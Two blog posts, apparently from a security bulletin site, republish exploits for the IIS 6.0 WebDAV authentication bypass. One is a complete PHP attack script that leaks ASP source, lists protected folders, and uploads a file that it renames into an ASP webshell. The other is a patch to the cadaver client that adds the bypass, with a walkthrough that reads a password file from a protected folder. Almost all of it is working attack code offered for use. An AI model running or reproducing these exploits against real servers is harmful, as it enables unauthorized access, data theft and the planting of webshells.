May 22

Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (php)

By jason Security Bulletin No Comments »

<?

print_r(‘
********  IIS 6 WEBDAV Exploit.By racle@tian6.com && Securiteweb.org  ********
                                                        
       Usage: php ‘.$argv[0].’ source/path/put host path   
       Example: php ‘.$argv[0].’ source www.tian6.com /blog/readme.asp       
       Example2: php ‘.$argv[0].’ path www.tian6.com /secret/
       Example3: php ‘.$argv[0].’ put www.tian6.com /secret/ test.txt(evil code as test.txt)
****************************************************************
‘);

//verification du debut
if($argv[1]!=”source”&&$argv[1]!=”path”&&$argv[1]!=”put”){echo “Choose a action,source or path or put.”;die;}
else {$action=$argv[1];}

if(stristr($argv[2],”http://”)){echo “No http:// in the host!”;die;}
else{$host=$argv[2];}

if(stristr($argv[3],”/”)==false){echo “Where is the / ?”;die;}
else{$path=$argv[3];}
//sent
function sent($sock)  
{  
global  $host, $html;  
$ock=fsockopen(gethostbyname($host),’80′);  
if (!$ock) {  
echo ‘No response from ‘.$host; die;  
}  
fputs($ock,$sock);  
$html=”;  
while (!feof($ock)) {  
$html.=fgets($ock);  
}  
fclose($ock);  
}  

if($action==”source”){
 $position=strrpos($path,”/”);
    $path=substr_replace($path,”%c0%af/”,$position,1);
 $sock=”GET “.$path.” HTTP/1.1\r\n”;
    $sock.=”Translate: f\r\n”;
 $sock.=”Host: “.$host.”\r\n”;
    $sock.=”Connection:close\r\n\r\n”;
 sent($sock);
 echo $html;
 die;
 }
if($action==”path”){
 $position=strrpos($path,”/”);
    $path=substr_replace($path,”%c0%af”,$position,0);
 $sock=”PROPFIND  “.$path.” HTTP/1.1\r\n”;
 $sock.=”Host: “.$host.”\r\n”;
    $sock.=”Connection:close\r\n”;
 $sock.=’Content-Type: text/xml; charset=”utf-8″‘.”\r\n”;
 $sock.=”Content-Length: 0\r\n\r\n”;
    $sock.=’<?xml version=”1.0″ encoding=”utf-8″?><D:propfind xmlns:D=”DAV:”><D:prop xmlns:R=”http://www.foo.bar/boxschema/”><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>’;
    sent($sock);
 $bur=explode(“<a:href>”,$html);
    foreach($bur as $line){$no=strpos($line,”<”);$resultat.=substr($line,0,$no).”\n”;}
    echo $resultat;
 die;
    }
if($action==”put”){
 echo “Remember,keep urfile in type txt!\r\n\r\n”;
     $fp = fopen(“test.txt”, ‘r’);
  if($fp!=false){
     while (false!==($char = fgets($fp))) {
     $fir1=$char;
     }
     fclose($fp);
 $position=strrpos($path,”/”);
    $path=substr_replace($path,”%c0%af”,$position,0);
    $sock=”PUT “.$path.”test.txt HTTP/1.1\r\n”;
 $sock.=”Host: “.$host.”\r\n”;
 $sock.=’Content-Type: text/xml; charset=”utf-8″‘.”\r\n”;
 $sock.=”Connection:close\r\n”;
 $sock.=”Content-Length: “.strlen($fir1).”\r\n\r\n”;
    $sock.=”".$fir1.”\r\n”;
    echo $sock; sent($sock);sleep(2);
 $sock=”MOVE “.$path.”test.txt HTTP/1.1\r\n”;
    $sock.=”Host: “.$host.”\r\n”;
    $sock.=”Connection:close\r\n”;
 $sock.=”Destination: “.$path.”racle.asp\n\n”;
    sent($sock);
 echo “Be cool,man! Webshell is http://”.$host.$path.”racle.asp“;
 die;}
 else{die;}
 }

Tagged with:
May 21

Microsoft IIS6 WebDAV Remote Authentication Bypass Exploit (patch)

By jason Security Bulletin 1 Comment »

Blog with a detailed description:
# http://www.skullsecurity.org/blog/?p=285
#
# And the patch itself:
# http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
#
# > mkdir cadaver-h4x
# > cd cadaver-h4x
# > wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
# –snip–
# > wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz
# –snip–
# > tar xzvf cadaver-0.23.2.tar.gz
# –snip–
# > cd cadaver-0.23.2/
# > patch -p1 < ../cadaver-0.23.2-h4x.patch
# patching file lib/neon/ne_basic.c
# patching file lib/neon/ne_request.c
# patching file lib/neon/ne_uri.c
# > ./configure
# –snip–
# > make
# –snip–
#
# Now we should have a patched, compiled version of cadaver, so start it
# up with the server that was identified as having a vulnerable folder
# earlier:
#
# > ./cadaver xxx.xxx.xxx.xxx
#
# This should drop you to a “dav:/>” prompt. Now just cd into the
# vulnerable folder and check out what’s there:
#
# dav:/> cd secret
# dav:/secret/> ls
# Listing collection `/secret/’: succeeded.
#        password.txt                           7  May 19 10:40
# dav:/secret/> cat password.txt
# Displaying `/secret/password.txt’:
# ron$pr0ns
# dav:/secret/>
#
# Here’s a list of commands that I’ve tested that work with the patched
# cadaver on a vulnerable folder:
# * CD
# * LS
# * MOVE
# * PUT
# * GET
# * CAT
# * DELETE

diff -rub cadaver-0.23.2/lib/neon/ne_basic.c cadaver-0.23.2-h4x/lib/neon/ne_basic.c
— cadaver-0.23.2/lib/neon/ne_basic.c    2008-02-07 16:22:07.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_basic.c    2009-05-20 16:13:46.000000000 -0500
@@ -402,7 +402,7 @@
     value = "infinity";
     break;
     }
-    ne_add_request_header(req, "Depth", value);
+    ne_add_request_header(req, "Depth", "1");
}
static int copy_or_move(ne_session *sess, int is_move, int overwrite,
diff -rub cadaver-0.23.2/lib/neon/ne_request.c cadaver-0.23.2-h4x/lib/neon/ne_request.c
— cadaver-0.23.2/lib/neon/ne_request.c    2008-01-30 05:35:52.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_request.c    2009-05-20 16:35:46.000000000 -0500
@@ -405,6 +405,7 @@
                            "Connection: TE" EOL
                            "TE: trailers" EOL);
     }
+    ne_buffer_czappend(req->headers, "Translate: f" EOL);
}
int ne_accept_always(void *userdata, ne_request *req, const ne_status *st)
@@ -420,6 +421,7 @@
ne_request *ne_request_create(ne_session *sess,
                   const char *method, const char *path)
{
+    char *path2 = ne_calloc(strlen(path)+7);
     ne_request *req = ne_calloc(sizeof *req);
     req->session = sess;
@@ -435,13 +437,18 @@
     req->method = ne_strdup(method);
     req->method_is_head = (strcmp(method, "HEAD") == 0);
+    if(strlen(path)>2)
+        sprintf(path2, "%c%c%%c0%%af%s", path[0], path[1], path+2);
+    else
+        path2 = path;
+
     /* Only use an absoluteURI here when absolutely necessary: some
      * servers can’t parse them. */
-    if (req->session->use_proxy && !req->session->use_ssl && path[0] == ‘/’)
+    if (req->session->use_proxy && !req->session->use_ssl && path2[0] == ‘/’)
     req->uri = ne_concat(req->session->scheme, "://",
-                 req->session->server.hostport, path, NULL);
+                 req->session->server.hostport, path2, NULL);
     else
-    req->uri = ne_strdup(path);
+    req->uri = ne_strdup(path2);
     {
     struct hook *hk;
diff -rub cadaver-0.23.2/lib/neon/ne_uri.c cadaver-0.23.2-h4x/lib/neon/ne_uri.c
— cadaver-0.23.2/lib/neon/ne_uri.c    2007-12-05 05:04:47.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_uri.c    2009-05-20 16:13:46.000000000 -0500
@@ -96,7 +96,7 @@
/* 0xXX    x0      x2      x4      x6      x8      xA      xC      xE     */
/*   0x */ OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT,
/*   1x */ OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT,
-/*   2x */ OT, SD, OT, GD, SD, PC, SD, SD, SD, SD, SD, PS, SD, DS, DT, FS,
+/*   2x */ OT, SD, OT, GD, SD, AL, SD, SD, SD, SD, SD, PS, SD, DS, DT, FS,
/*   3x */ DG, DG, DG, DG, DG, DG, DG, DG, DG, DG, CL, SD, OT, SD, OT, QU,
/*   4x */ AT, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL,
/*   5x */ AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, GD, OT, GD, OT, US,

Tagged with:
preload preload preload